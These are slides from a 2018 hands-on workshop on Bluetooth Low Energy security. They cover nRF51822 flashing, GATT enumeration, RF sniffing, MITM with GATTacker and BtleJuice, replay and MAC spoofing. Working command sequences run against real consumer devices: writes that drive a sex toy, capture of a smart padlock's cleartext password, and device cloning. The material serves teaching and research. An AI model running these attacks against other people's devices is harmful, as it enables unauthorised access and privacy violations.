Sławomir Jasek

[Link]@[Link]
@slawekja

BLE security essentials

[Link], Hague, 13.09.2018

Sławomir Jasek – short Sławek [suaveck]

Enjoy appsec (dev, break, build...) since 2003.

Pentesting, consulting, training - web, mobile,

embedded, ...

Trainings, workshops, tutorials:

[Link]

Significant part of time for research.

How much can we fit in a 2 hour workshop?

Bluetooth Smart?
Our hardware – flashing, embedded development
BLE advertisements, connections, services, characteristics
Sniffing BLE
BLE „Man in the Middle”, relay, replay
BtleJacking
General idea

Workshop for BLE beginners.

Most exercises possible to repeat later at home using the
provided hardware.
Bluetooth Smart?
AKA Bluetooth 4, Bluetooth Low Energy
One of most exploding recently IoT technologies.
Completely different than previous Bluetooth 2, 3 (BR/EDR).
Designed from the ground up for low energy usage,
simplicity (rather than throughput).
The main usage scenarios:
a) Advertising (broadcast)
b) Communication between 2 devices (master /
peripheral)
It’s magic...

[Link]
[Link]
Startups
1. Come out with a bright idea where to
put a chip in.

2. Buy BLE devkit, some soldering,

integrate mobile app

3. Convincing website + video (bootstrap)

4. Crowdfunding!

5. Profit! [Link]
[Link]
[Link]
[Link]
Fuze card: emulates magnetic stripe credit cards

[Link]
BLE DEVKIT
Why I want you to become embedded developer?

Have your own device, created yourself, for stable exercises.

Possibility to tamper with various options, settings, ...

The best way to understand what happens „under the

hood” and why so many devices remain insecure.
Challenge to secure the default code.
Our hardware set

BLE400 + nRF51822
USB BLE adapters

ST-Link V2
USB UART
Connector wires
Why nRF51822?

- Cheap (below $3 on Aliexpress)

- Easy to develop custom firmware using online [Link]

ready templates

- Easy to flash using $5 ST-Link or Raspberry Pi GPIO

- Works as BLE RF sniffer (Nordic)

- Works with open-source BtleJack (sniffing/hijacking)

BLE400 nRF51822 eval kit

[Link]

• BLE400 motherboard

• nRF51822 Core module

• Aliexpress: starting at $11
Components

nRF51822 Core module BLE400 motherboard

- nRF51822 chip - USB UART interface
- integrated antenna - pinout (standard 2.5mm), various
- pinout (2mm) other connectors
- starting at $2.75 - jumpers, LEDs, buttons
- starting at $9
[Link]

Free compiler online (free account required)

[Link]

Once logged in, open the nRF board page:

[Link]
Add board
Now back in the compiler
New->New Program, choose template
Hello world = blinky
Blinky source
Blinky [Link] – blink LED1 few times a second
 Compile

Resulting compiled hex

firmware, to flash module
Note

Recently on [Link] you may encounter problems with online

compilation of examples (known bug, should be resolved soon).

Source files for „smartlockpicking” device are in the VM:

nrf/smartlockpicking/smartlockpicking_uvision5_nrf51822.zip

You can import this zip into [Link] (it will compile without
error). You can also use offline mbed CLI or other IDE (e.g. Keil).
Flashing nRF51822 module

Can be flashed using SWD:

- STM32 debugger hardware
(e.g. ST-Link V2)
- Raspberry Pi GPIO
ST-Link V2

Non-original starting at $5
Works with open-source software
openocd ([Link])
Connect ST-Link to BLE400

SWDIO – SWIO
SWCLK – SWD

GND – GND
3.3V unconnected, we’ll
power board using USB
Connect BLE400
Openocd (already installed)

Kali Linux (already in your VM):

# apt-get install openocd
Openocd – parameters

root@kali:~# openocd -f
/usr/share/openocd/scripts/interface/[Link]
-f /usr/share/openocd/scripts/target/[Link]

Select ST-Link V2 as Connect to nRF51 target

interface
Start openocd ready script in your VM

root@kali:~# ./[Link]
Ready to use script [Link] in your VM

Successfully connected
Troubleshooting: bad connection

cortex_m reset_config sysresetreq

adapter speed: 1000 kHz
Info : BCM2835 GPIO JTAG/SWD bitbang driver
Info : SWD only mode enabled (specify tck, tms, tdi
and tdo gpios to add JTAG mode) 1. Have you powered
Info : clock speed 1001 kHz the board via USB?
2. Check your wiring
Info : SWD DPIDR 0x00000001
Error: Could not initialize the debug port
Connect to Openocd console

Openocd listens on TCP/4444. Open new terminal, connect

using telnet:
root@kali:~# telnet localhost 4444
Trying ::1...
Trying [Link]...
Connected to localhost.
Escape character is '^]'.
Open On-Chip Debugger
>
Openocd: „format” flash

Open On-Chip Debugger

> halt
target halted due to debug-request, current mode: Handler HardFault
xPSR: 0xa1000003 pc: 0x0001c320 msp: 0x20003ea8
> nrf51 mass_erase
nRF51822-QFAC(build code: A1) 256kB Flash
> reset
> halt
target halted due to debug-request, current mode: Handler HardFault
xPSR: 0xc1000003 pc: 0xfffffffe msp: 0xffffffd8
 Openocd – write firmware to flash
Choose your ID
> flash write_image nrf/smartlockpicking/[Link]
Padding image section 0 with 2112 bytes
Padding image section 1 with 2856 bytes
using fast async flash loader. This is currently supported
only with ST-Link and CMSIS-DAP. If you have issues, add
"set WORKAREASIZE 0" before sourcing [Link] to disable it
Successtarget halted due to breakpoint, current mode: Handler HardFault
xPSR: 0x61000003 pc: 0x2000001e msp: 0xffffffd8
wrote 126572 bytes from file nrf/smartlockpicking/[Link] in 3.117295s
(39.652 KiB/s)
> reset

Reset the device, new firmware will

start running, LED should blink
In case of trouble...

Padding image section 0 with 2112 bytes

Padding image section 1 with 2856 bytes
using fast async flash loader. This is currently supported
only with ST-Link and CMSIS-DAP. If you have issues, add
"set WORKAREASIZE 0" before sourcing [Link] to disable it
timeout waiting for algorithm, a target reset is recommended
Failed to write to nrf51 flash
error writing to flash at address 0x00000000 at offset 0x00000000
... try again with reset and halt

> reset

> halt

target halted due to debug-request, current mode:

Handler HardFault

xPSR: 0xc1000003 pc: 0xfffffffe msp: 0xffffffd8

BLE ADVERTISEMENTS
BLE broadcast -> receive

advertisement

Public, by design available for all in

range
(with exception of targeted advertisements, not
widely used in practice)
 Mobile apps

Android: iOS:
nRF Connect for nRF Connect for
Mobile Mobile
[Link] [Link]
ps/details?id=[Link] ocate-beacon/id738709014
[Link]

LightBlue
[Link]
ightblue-bluetooth-low-
energy/id557428110
Your device advertisement in nRF Connect

0x08 –
shortened
local name
Advertisement data

Devices broadcast data formatted according to „Generic Access Profile” specification, for
example („header” values):

0x08 «Shortened Local Name»

0x09 «Complete Local Name»

0x16 «Service Data» Beacon values, manufacturer

proprietary...
0xFF «Manufacturer Specific Data»

[Link]
Linux – interacting with BLE

BlueZ, command-line tools, scripting languages...

Hardware: BLE USB dongle

CSR8510 – most common, good enough, ~ 5 EUR

Other chips (often built in laptops)

• Intel, Broadcom, Marvell...
• May be a bit unstable (e.g. with MAC address change)

Power:
• Class II – 2.5 mW, 10m range – most common
• Class I – 100 mW, 100 m range – more expensive, actually not necessary
Update: Kali 2018.3 VM problem

You may experience instability with external USB BLE adapters

with Kali Linux 2018.3 VM (the one provided for workshop).
Example symptom:

Multiple tools may unexpectedly „hang” or not work correctly

(hcitool lescan, gatttool, gatttacker, bleah, ...).
Update: Kali 2018.3 VM problem

Suspected cause: new Linux kernel

[Link]

Solution:
- use Kali 2018.2 with previous kernel 4.15
- downgrade kernel to 4.15 manually
Downgrade kernel to 4.15 manually

1. Edit /etc/apt/[Link] and add following line:

deb [allow-insecure=yes] [Link] 2018.2 main
2. Update the repositories
# apt-get update
3. Install kernel 4.15:
# apt-get install linux-image-4.15.0-kali2-amd64
(...)
Install these packages without verification? [y/N] y
Downgrade kernel to 4.15 – boot

4. Boot into the 4.15 kernel.

Choose „advanced options (...)” during boot, then „Linux 4.15...”
Turn off sharing Bluetooth devices with host

Turn off
Connect „Cambridge Silicon Radio” to VM

root@kali:~# hciconfig
hci0: Type: BR/EDR Bus: USB
BD Address: [Link] ACL MTU: 310:10 SCO MTU: 64:8
UP RUNNING
RX bytes:568 acl:0 sco:0 events:29 errors:0
TX bytes:357 acl:0 sco:0 commands:30 errors:1

root@kali~#: hciconfig hci0 up

root@kali:~# hciconfig hci0 version
hci0: Type: BR/EDR Bus: USB
BD Address: [Link] ACL MTU: 310:10 SCO MTU: 64:8
HCI Version: 4.0 (0x6) Revision: 0x22bb
LMP Version: 4.0 (0x6) Subversion: 0x22bb
Manufacturer: Cambridge Silicon Radio (10)
The device advertisement

root@kali:~# hcitool lescan

LE Scan ...
[Link] smartlockpicking01
[Link] (unknown)
[Link] smartlockpicking01
[Link] (unknown)
 Bleah

[Link]
[Link]
# bleah
Your device advertisement in bleah

root@kali:~# bleah
Introducing GATTacker – [Link]

Open source
[Link]
Websockets
Modular design
Json
.io website

And a cool logo!

Install in current Kali (since 2018.2)

root@kali:~# apt-get install nodejs npm

root@kali:~# npm install gattacker
Step 1 – run ws-slave module

advertisement

Advertisement
JSON [Link]

[Link]
Running the ws-slave (client)

root@kali:~# cd node_modules/gattacker

root@kali: ~/node_modules/gattacker # node [Link]

GATTacker ws-slave
Step 2 – scan (connecting to ws-slave)

advertisement

Advertisement
JSON [Link]

[Link]
Scan for advertisements

root@kali:~/node_modules/gattacker# node [Link]

Ws-slave address: [Link]

on open

poweredOn

Start scanning.
Troubleshooting

root@kali:~/node_modules/gattacker# node
scan
Ws-slave address: [Link]
on open Your BLE adapter is off
# hciconfig hci0 up
poweredOff
[Link]

# node [Link]
connects to ws-slave
listens to all advertisements,
saves them automatically to JSON files (devices/ subdir).
GATTacker: scan for devices

Device MAC
The advertisement file

Node_modules/gattacker/devices/<MAC>_<name>.[Link]
"id": "d0c92e6350b3",
"eir": "0201041308736d6172746c6f636b7069636b696e673031", Raw hex data (according to
"scanResponse": null, BLE spec), used later
"decodedNonEditable": {
"localName": "smartlockpicking01",
"manufacturerDataHex": null,
"manufacturerDataAscii": null, Decoded just for display
"serviceUuids": []
}
Sex toys...

[Link]
locating-and-exploiting-smart-adult-toys/ [Link]
„Screwdriving”

Devices just announce their name.

You don’t need any tools to see it.
„Screwdriving”

List of the sex toys

Bluetooth names:
[Link]
Screwdriver/blob/master/Device_List.txt

We’ll get back to these devices later.

BLE SERVICES
BLE central <-> peripheral

BLE

central peripheral
Services, characteristics, ... SERVICE, eg. 0x180F - battery

Characteristic

Descriptor: string
(e.g. “Battery level”)
Service – groups several characteristics
Descriptor:
subscription status

Characteristic – contains a single value Properties: read, write, notify

(authenticated or not)

Descriptor – additional data

Value

Properties – read/write/notify...
Characteristic
(...)

Value – actual value

SERVICE
(...)
Your „smartlockpicking” device

You will connect to your

„smartlockpicking” device using nRF
Connect mobile application.
Services in nRF Connect SERVICE, eg. 0x180F - battery

services

SERVICE
(...)
Device characteristics (in service) SERVICE, eg. 0x180F - battery

Characteristic

Properties: read, write, notify

(authenticated or not)

Characteristic
(...)

SERVICE
(...)
Reading, writing, notifications

Each characteristic has properties: read/write/notify

Can be combined (e.g. read+notify, read+write, ...)

Read/write – transmit single value

Notifications

• Getting more data or receiving periodic updates from a

device
• The central device subscribes for a specific characteristic,
and the peripheral device sends data asynchronously
Read characteristic in nRF Connect
Our LED switching
service with 2
characteristics

Read value

This value in our

device: current LED
status
Write to characteristic in nRF Connect

01: turns on the

LED

write
Linux: device advertisement

root@kali:~# hcitool lescan

LE Scan ...
[Link] smartlockpicking01
[Link] (unknown)
[Link] smartlockpicking01
[Link] (unknown)

MAC address
gatttool – blueZ command-line interface
The device advertises
random MAC address type

root@kali:~# gatttool -I -b [Link] -t random

[Link][LE]>

Your device MAC address

Interactive
Connect to it from Kali - gatttool

root@kali:~# gatttool -I -b [Link] -t random

[Link][LE]> connect

Attempting to connect to [Link]

Connection successful

[Link][LE]>

Blue = connected
Troubleshooting

Check if your BLE adapter is up

# hciconfig hci0
Troubleshooting v2

a) Start Bluetooth service

# systemctl start bluetooth
b) Try with random address type
# gatttool –I –b <MAC> -t random
Read characteristic value Handle for 0x2a00
(Device Name)

[Link][LE]> char-read-hnd 0x03

Reading characteristics

Read value from characteristic, using handle

[Link][LE]> char-read-hnd 0x03

ascii hex
Decode HEX: e.g. in CyberChef

[Link]
Toggle the LED status

The characteristics that switch the LEDs as visible in

[Link][LE]> characteristics

Handle 0x0025, 0x0027

Toggle the LED status handle

value
[Link][LE]> char-write-req 0x25 01
[Link][LE]> char-write-req 0x25 00

[Link][LE]> char-write-req 0x27 01

[Link][LE]> char-write-req 0x27 00
Our sex toy: writing to characteristics
Writing to characteristics

Let’s vibrate our sex toy!

root@kali:~# gatttool -I -b [Link]
We will explain later how
[Link][LE]> connect we got these values

[Link][LE]> char-write-cmd 0x36 c5552daa

Enumerate services + characteristics in bleah

root@kali:~# bleah -b [Link] -e

Your MAC
Bleah vs sex toy (enumerate services)
Bleah vs sex toy: vibrate

Using bleah: -b <MAC> -n <handle> -d <data>

root@kali:~# bleah -b [Link] -n 0x36 -d c5552daa

GATTacker

1) Run the ws-slave

2) Run scan – without parameters just scans for all
advertisements, finds all the devices nearby
3) Run scan for specific device (MAC) – scans device
services and characteristics to JSON file
GATTacker

advertisement

Advertisement
JSON, services
JSON
[Link]
services?

[Link]
GATTacker: running the ws-slave (client)

$ cd node_modules/gattacker

$ ~/node_modules/gattacker $ sudo node [Link]

GATTacker ws-slave
GATTacker: scan for devices

Device MAC
Scan specific device characteristics Target device
MAC

root@kali:~/node_modules/gattacker# node scan f4b85ec06ea5

Ws-slave address: <your_slave_ip>
on open
poweredOn
Start exploring f4b85ec06ea5
Start to explore f4b85ec06ea5
explore state: f4b85ec06ea5 : start
explore state: f4b85ec06ea5 : finished
Services file devices/[Link] saved!
Json services file
SERVICE, eg. 0x180F - battery
(devices/<MAC....>.[Link]) Characteristic

service Descriptor: string

{ (e.g. “Battery level”)
"uuid": "1800",
"name": "Generic Access", Descriptor:
"type": "[Link].generic_access", subscription status
"startHandle": 1,
"endHandle": 11,
Properties: read, write, notify
"characteristics": [
{
characteristics (authenticated or not)
"uuid": "2a00",
"name": "Device Name",
"properties": [ Value
"read"
],
"value": "5061646c6f636b21",
"descriptors": [], Characteristic
"startHandle": 2, (...)
"valueHandle": 3,
"asciiValue": "Padlock!"
}, SERVICE
(...)
BLE SNIFFING
Hacking challenge – steal a car!
How do we hack it?

BLE

Passive sniffing?
central peripheral
Bluetooth 4 security (specification)

Pairing
Key Generation
Encryption
Encryption in Bluetooth LE uses AES-CCM cryptography. Like BR/EDR, the LE Controller
will perform the encryption function. This function generates 128-bit encryptedData
from a 128-bit key and 128-bit plaintextData using the AES-128-bit block cypher as
defined in FIPS-1971.
Signed Data
[Link]
Bluetooth 4 security (specification)

„The goal of the low energy security mechanism is to protect

communication between devices at different levels of the
stack.”
• Man-in-the-Middle (MITM)
• Passive Eavesdropping
• Privacy/Identity Tracking
Bluetooth 4.0 - pairing
Pairing (once, in a secure environment)
• JustWorks (R) – most common, devices without display cannot
implement other
• 6-digit PIN – if the device has a display
• Out of band – not yet spotted in the wild
Establish Long Term Key, and store it to secure future
communication ("bonding")
"Just Works and Passkey Entry do not provide any passive
eavesdropping protection"
4.2 – elliptic curves
Mike Ryan, [Link]
BLE security - practice
• 8 of 10 tested devices do not implement BLE-layer encryption
• The pairing is in OS level, mobile application does not have full control over it
• It is troublesome to manage with requirements for:
• Multiple users/application instances per device
• Access sharing
• Cloud backup
• Usage scenario does not allow for secure bonding (e.g. public cash register,
"fleet" of beacons, car rental)
• Other hardware/software/UX problems with pairing
• "Forget" to do it, or do not consider clear-text transmission a problem
BLE security - practice
Security in "application" layer
(GATT)
Various authentication schemes
• Static password/key
• Challenge-response (most common)
• „PKI”
Requests/responses encryption
No single standard, library,
protocol
Own crypto, based usually on AES
Sniffing – BLE RF essentials
Advertisement channels

[Link]
BLE channel hopping

37 channels for data,

3 for advertisements
Sniffing: catch the initial
packet and follow
channel hopping

[Link]
y-mikeryan-usenix_woot_2013-[Link]
Catching initial packet to follow

Connection starts at one of 3 advertisement channels.

Device can limit the used channels, but usually use all 3 and
can start at any of them.
Catching initial packet:
- Sniff all the 3 advertising channels at once
- Sniff just one channel and have luck
Pro devices ($$$) – scan whole spectrum

Ellisys Bluetooth Explorer 400 ComProbe BPA® 600 Dual

All-in-One Bluetooth® Protocol Mode Bluetooth®
Analysis System
Protocol Analyzer
[Link] [Link]
Software Defined Radio

BLE SDR sniffer for HackRF One:

[Link]
Passive sniffing – Ubertooth (120$)

Open-source (software, hardware).

External antenna.

RF-level sniffing, possible to inspect in

Wireshark.

Can be combined in 3 to cover all advertising

channels.

[Link]
Nordic BLE sniffer

Turn nRF device (e.g. devkit) into sniffer.

[Link]
energy/nRF-Sniffer
Adafruit Bluefruit LE sniffer ($25)
[Link]
Turn our BLE module into sniffer

Same nRF51822, a bit

cheaper than Adafruit.

Need to be flashed with

sniffer firmware.

New version 2.0.0-beta

available here.
[Link]
Our „smartlockpicking” device

Take out the module from BLE400 board, it will now work as
a standalone device.
Just VCC (3V, not 5!) and GND.
Our „smartlockpicking” device can work standalone

Just connect VCC (3V) and GND,

you can use the BLE400
2mm -> 2.54 mm wires required

VCC GND
BTW, you can connect external USB TTL
External USB TTL

RXD->P09
TXD->P011

3V (NOT 5!) VCC

GND
Now put the second module in the board to flash

Second module to
flash with sniffer

Standalone
„smartlockpicking” device,
just powered from board
Flash second module with a sniffer firmware

> halt
> nrf51 mass_erase
> reset
> halt
> flash write_image
nrf/sniffer/sniffer_pca10028_51296aa.hex
(...)
> reset
Setting up the sniffer – connect to USB

root@kali:~# dmesg
(...)
[25958.451531] usb 2-2.2: new full-speed USB device number 10 using
uhci_hcd
[25958.707592] usb 2-2.2: New USB device found, idVendor=10c4,
idProduct=ea60
[25958.707596] usb 2-2.2: New USB device strings: Mfr=1, Product=2,
SerialNumber=3
[25958.707598] usb 2-2.2: Product: CP2102 USB to UART Bridge Controller
[25958.707600] usb 2-2.2: Manufacturer: Silicon Labs
[25958.707601] usb 2-2.2: SerialNumber: 0001
[25958.713131] cp210x 2-2.2:1.0: cp210x converter detected
[25958.717133] usb 2-2.2: cp210x converter now attached to ttyUSB0
Wireshark installation #1 (already in your VM)

Help->About->Folders

Check the Extcap path

Wireshark #2 install extcap (already in your VM)

Unzip the Sniffer downloaded from Nordic:

root@kali:~/nrf_sniffer_2.0.0-beta-1_51296aa/extcap# ls

nrf_sniffer.bat nrf_sniffer.py SnifferAPI

root@kali:~/nrf_sniffer_2.0.0-beta-1_51296aa/extcap# cp -r
* /usr/lib/x86_64-linux-gnu/wireshark/extcap/
Wireshark install #3 – turn on interface toolbar

View-> Interface
Toolbars -> nRF Sniffer
Wireshark

nRF Sniffer toolbar

Your sniffer device

detected properly. Click
here to start sniffing
Filter specific
device
Tons of
advertisements
Filter specific device
[Link]
Let’s try to sniff „Padlock!” device
The advertising channels again
Advertisement channels

[Link]
Limit the channels for sniffing

In order to you maximize a chance to get a connection, you

can have 3 independent sniffers, set for specific channels.
Limit the channel on your sniffer, only to 37 or 38 or 39.
„btatt”: filter out the advertisements, only read/write,...
Filter only write requests ([Link] == 0x12)

Find write packet, right click on Opcode

(Write Request) and apply as filter
Gotcha!

„12345678” – cleartext password

 Quicklock hack is brought to you by Antony Rose

[Link]
Manufacturer’s statement

The electronic codes necessary to open are passed wirelessly and are
unencrypted (by design) to allow vendors flexibility when integrating the
bluetooth device into existing platforms. Because keys are passed wirelessly,
they are open to Bluetooth hacking only for a few seconds, when a hacker is
within range of the device. However, this level of security is similar to a
standard lock and key scenario! Standard mechanical devices offer far fewer
benefits than Bluetooth connected locks!

[Link]
ANDROID HCIDUMP
„WHITEBOX” APPROACH
How do we hack BLE?

HCI dump BLE

Passive sniffing?
central peripheral
Android HCI dump – white box approach

1. Enable Developer options in Android

About phone->Build number-> tap until „You are now a developer!”
2. Settings->Developer options->Enable Bluetooth HCI log
The file is saved in /sdcard/btsnoop_hci.log
Readable in Wireshark
Host Controller Interface

Linux (BlueZ), Android...

# hcidump
Hcidump

Dumps commands and data exchanged between host OS and adapter

firmware.

You will see only public advertisements and data exchanged with your
host.

In case of link-layer encryption, hcidump shows unencrypted data.

Does not dump raw RF packets.

BLE-Replay by NCC

[Link]
Parses hcidump to json, wraps into python BLE client for
replay/fuzzing
Example btsnoop_hci.log for our padlock
How do we hack BLE?
Passive sniffing Android HCI dump
Using simple hw is unreliable, Catches all the packets (of our
easy to loose packets. transmission)

Difficult to understand Difficult to understand transmission

transmission in Wireshark. in Wireshark

Limited scripting – decode pcap, Limited scripting – decode pcap,

replay packets. replay packets.

Can be helpful to diagnose what Does not cover link-layer. Only data
is happening on link-layer (e.g. exchanged between Android and BT
Bluetooth encryption) adapter

Does not require access to device Requires access to smartphone

nor smartphone
Even if the connection is encrypted,
Limited possibilities to decode we have the packets in cleartext (de-
encrypted connections (intercept /encrypted by adapter)
pairing + CrackLE).
INTERCEPTING
MOBILE APP
Frida – hooking mobile app

a
Frida

HCI dump BLE

Passive sniffing?
central peripheral
Frida hooks in mobile application

Replace writing to characteristic with your own function

[Link]
Frida - results

[Link]
Possible advantage

This way it may be possible to hook into cleartext values

before encryption/obfuscation.
BLE MITM
The car hacking contest again
Sometimes...

We can sniff the link

communication, but it is
encrypted on GATT layer.
(we see only encrypted hex
stream)
How about active interception?

Man in the Middle:

We will force the mobile app to connect to us, and forward
the requests to the car and back!
How do we hack BLE?

Active
HCI dump BLE MITM

Passive sniffing?
central peripheral
How do we MITM RF?

Mallory

Alice

Bob
Isolate the signal?
Physics...

Bending of a wave around the edges of an opening

or an obstacle

[Link]

[Link]
 Stronger signal? More signals?

Class 1 adapter? +8dBm, 100m range

"little difference in range whether the other

end of the link is a Class 1 or Class 2 device as
the lower powered device tends to set the
range limit"
And how to handle them in a single system?
[Link]
Typical connection flow
Start scanning for
advertisements

Advertise

Specific advertisement
received, stop scanning

Connect the advertising device (MAC)

Further communication
Attack?
Start scanning for
advertisements
Advertise more
frequently
Specific advertisement
received, stop scanning
MITM?
Keep connection to
original device. It
does not advertise
Connect the advertising device (MAC) while connected ;)

Further communication
MITM – what actually works

Advertise more frequently

• The victim's mobile will interpret the first advertisement it receives
• Devices usually optimized for longer battery life, advertise less frequently
Clone MAC address of targeted device
• Not always necessary, but mostly helpful
Keep connected to target device
• Devices do not advertise while connected
• Only one connection at a time accepted
• Usually easy, most connections are short-term
• For constantly-connected: targeted jamming/social engineering/patience...
GATTacker – MITM

Open source
[Link]
Websockets
Modular design
Json
.io website

And a cool logo!

GATTacker - architecture
Advertising „cloned”
device Advertise

Get serv Get serv

Device cloning

services services

„PROXY” –
interception,
tampering
We will team up for 2 separate boxes
Advertising „cloned”
device Advertise

Get serv Get serv

Device cloning

servicesBox 1 – Box 2 – services

emulated device „PROXY” – connects to

interception,
tampering
target
Separate boxes

It is possible to run both components on one box (configure

BLENO/NOBLE_HCI_DEVICE_ID in [Link]).
But it is not very reliable at this moment (kernel-level device
mismatches).
Much more stable results on a separate ones.
Box 2 – switch VM to „bridge mode”, check IP
Box 2 - run ws-slave (client)

root@kali:~# cd node_modules/gattacker

root@kali: ~/node_modules/gattacker # node [Link]

GATTacker ws-slave
Box 1 (emulating device) – edit config file

root@kali:~# cd node_modules/gattacker/

root@kali:~/node_modules/gattacker# gedit [Link]

Edit BLENO_HCI_DEVICE_ID to your HCI, WS_SLAVE address to

match your Raspberry
# "peripheral" device emulator
BLENO_HCI_DEVICE_ID=0
# ws-slave websocket address
WS_SLAVE=[Link] -> IP_OF_YOUR_COLLEGUE
1. Scan device to JSON
Box 1 Box 2

advertisement

WIFI
Advertisement
+ services JSON [Link]

[Link]
Scan for advertisements (Kali)

root@kali:~/node_modules/gattacker# node [Link]

Ws-slave address: <your_slave_ip>

on open

poweredOn

Start scanning.
GATTacker: scan for devices

Device MAC
Scan device characteristics Target device
MAC

root@kali:~/node_modules/gattacker# node scan f4b85ec06ea5

Ws-slave address: <your_slave_ip>
on open
poweredOn
Start exploring f4b85ec06ea5
Start to explore f4b85ec06ea5
explore state: f4b85ec06ea5 : start
explore state: f4b85ec06ea5 : finished
Services file devices/[Link] saved!
2. Advertise

advertisement Advertisement
+ services JSON

[Link]
Free the BT interface

In case you have running ws-slave on the same machine, stop it (we
will need the BT interface):
(...) ws -> close

^Croot@kali:~/node_modules/gattacker#

Also stop bluetooth service, it may interfere:

root@kali:~# systemctl stop bluetooth

Check that your bluetooth adapter is up

# hciconfig
hci0: Type: Primary Bus: USB
BD Address: [Link] ACL MTU: 310:10 SCO MTU: 64:8
DOWN RUNNING
RX bytes:574 acl:0 sco:0 events:30 errors:0
TX bytes:368 acl:0 sco:0 commands:30 errors:0
# hciconfig hci0 up
# hciconfig
hci0: Type: Primary Bus: USB
BD Address: [Link] ACL MTU: 310:10 SCO MTU: 64:8
UP RUNNING
RX bytes:1148 acl:0 sco:0 events:60 errors:0
TX bytes:736 acl:0 sco:0 commands:60 errors:0
advertise

root@kali:~/node_modules/gattacker# node [Link] -h

Usage: node advertise -a <FILE> [ -s <FILE> ] [-S]
-a, --advertisement=FILE advertisement json file
-s, --services=FILE services json file
-S, --static static - do not connect to ws-slave/target
device
-f, --funmode have fun!
--jk see [Link]
-h, --help display this help
Start to advertise your device

root@kali:~/node_modules/gattacker# node [Link] -a

devices/d0c92e6350b3_srtlockpicking01.[Link]

Your device advertisement (not

services) json file. The script assumes
services file (-s) is <mac>.[Link]
Properly initialized

Connection to target device

established
Troubleshooting

The script stops here, cannot

connect to target device

If you are already connected to your device, disconnect.

Try to restart your device.
Troubleshooting v2

Connection to target device successful,

but BLE interface for emulation is down

Is your Bluetooth adapter interface up?

# hciconfig hci0 up
Connect to your emulated device

Notice the MAC address is your

BLE adapter’s MAC, not original
device.
The advertising interval is also a
magnitude shorter.
Now try to send something to device from nRF

Intercepted read and

write requests
REPLAY
Data dump of the intercepted communication

dump/<MAC>.log
Dump data format

Logs are saved in text format:

timestamp | type | service UUID (optional name) | characteristic

UUID (optional name) | hex data (ascii data)

example:

2017.03.24 [Link].930 | > R | 180f (Battery Service) | 2a19

(Battery Level) | 50 (P)
Transmission type

> R - received read

> N - received notification

< W - sent write request (without response)

< C - sent write command (with response)
Replay

You can edit the dump file, e.g. change value „01” to „00”
2018.03.22 [Link].321 | < C | a000 | a001 | 00 ( )
Replay script

root@kali:~/node_modules/gattacker# node [Link]

-i dump/[Link] -p d0c92e6350b3 -s
devices/[Link]
Target device
Target device MAC
services, previously
Dump file scanned
Replay using nRF Connect mobile app

[Link]

nRF Connect:

[Link]
Macros functionality

nRF Connect: macros documentation:

[Link]
Connect/tree/master/documentation/Macros
GATTacker howto export:
[Link]
replay
Convert GATTacker log to nRF XML macro

# node gattacker2nrf -i dump/[Link] > [Link]

MAC SPOOFING
Bluetooth MAC address spoofing

Some mobile applications rely only on advertisement

packets, and don’t care for MAC address.
But most of them (including this one) do.
It is easy to change Bluetooth adapter MAC using bdaddr
tool (part of Bluez)

For some chipsets it may be troublesome.

Bdaddr (already in your VM/Raspberry)

root@kali:~/node_modules/gattacker/helpers/bdaddr# make

gcc -c bdaddr.c

gcc -c oui.c

gcc -o bdaddr bdaddr.o oui.o -lbluetooth

# cp bdaddr /usr/local/sbin
Change MAC
root@kali:~# bdaddr
Can't read version info for hci0: Network is down (100)
root@kali:~# hciconfig hci0 up
root@kali:~# bdaddr
Manufacturer: Cambridge Silicon Radio (10)
Device address: [Link] Your target MAC
root@kali:~# bdaddr -i hci0 [Link]
Manufacturer: Cambridge Silicon Radio (10)
Device address: [Link]
New BD address: [Link] Now re-plug the interface
to reset it
Address changed - Reset device now
root@kali:~# hciconfig hci0 up
root@kali:~# bdaddr
Manufacturer: Cambridge Silicon Radio (10) Check the MAC address is
Device address: [Link] changed
Simple helper script to change MAC automatically
For the helper script (changing MAC automatically)

Uncomment in [Link]
# "peripheral" device emulator

BLENO_HCI_DEVICE_ID=0

ID of your advertising
adapter (0 for hci0)
Start device – mac_adv (wrapper to [Link])

root@kali:~node_modules/gattacker# ./mac_adv -a
devices/f4b85ec06ea5_Padlock-.[Link] -s devices/[Link]
Advertise with cloned MAC address
Manufacturer: Cambridge Silicon Radio (10)
Helper bash script to
Device address: [Link]
change MAC addr
New BD address: [Link]

Address changed - Reset device now

Re-plug the interface and hit enter Re-plug USB adapter
Cleartext password:
12345678
BTLEJUICE
Introducing BtleJuice by Damien Cauquil @virtualabs

[Link]
[Link]

[Link]

The concept of multiple discovery (also known as simultaneous invention) is the

hypothesis that most scientific discoveries and inventions are made independently and
more or less simultaneously by multiple scientists and inventors.
Install in Kali (already in your VM)

# apt-get install nodejs npm

# npm install --unsafe-perm -g btlejuice
BtleJuice – run „proxy” on Box 1

root@kali:~# hciconfig hci0 up

root@kali:~# btlejuice-proxy

[i] Using interface hci0

[info] Server listening on port 8000

BtleJuice interface – box 2

root@kali:~# btlejuice -u <your_proxy_ip> -w

[Link]

Start scanning for

devices
Properly set-up
Now connect to emulated device and try to write
Btlejuice - replay

Right-click on any row

and select „Replay”
Btlejuice - replay

You can change the

value here
Btlejuice - hook

Right-click on a row
and select „Set hook”
Btlejuice - hook

Now try to read or write to given characteristic – popup:

You can change the value here

BtleJuice vs GATTacker

- Depends on stock noble/bleno – several pros vs cons

- Automatic MAC address spoofing currently unstable

- Has much better UI (web vs console), simple

replay/tamper
- Just try the other tool if something does not work for you
How do we hack BLE?
Passive sniffing Android HCI dump Active MITM
Using simple hw is unreliable, Catches all the packets (of our Catches all the packets (+ allows
easy to loose packets. transmission) for active modification)

Difficult to understand Difficult to understand Easy to understand transmission

transmission in Wireshark. transmission in Wireshark (GATTacker console, BtleJuice web)
Limited scripting – decode pcap, Limited scripting – decode pcap,
replay packets. replay packets. Hooks, possible to proxy, API for
live packets tampering...
Can be helpful to diagnose what Does not cover link-layer. Only data
is happening on link-layer (e.g. exchanged between Android and Does not cover link-layer. Not that
Bluetooth encryption) BT adapter we actually need it ;)

Does not require access to device Requires access to smartphone Does not require access to device
nor smartphone nor smartphone
Even if the connection is
Limited possibilities to decode encrypted, we have the packets in Will not work (out of box) against
encrypted connections (intercept cleartext (de-/encrypted by link-layer Bluetooth encryption
pairing + CrackLE). adapter)
THE SEX TOY AGAIN
BTW the sex toy intercepted in GATTacker

# node scan 38d269e523b1

# ./mac_adv -a devices/38d269e523b1_REALOV-
[Link]
BTW, the sex toy intercepted in GATTacker
Characteristics, write
Vendor response

[Link]

Would you call it „hack”?

 Or does it?
[Link]
Proximity = limited risk, valid point

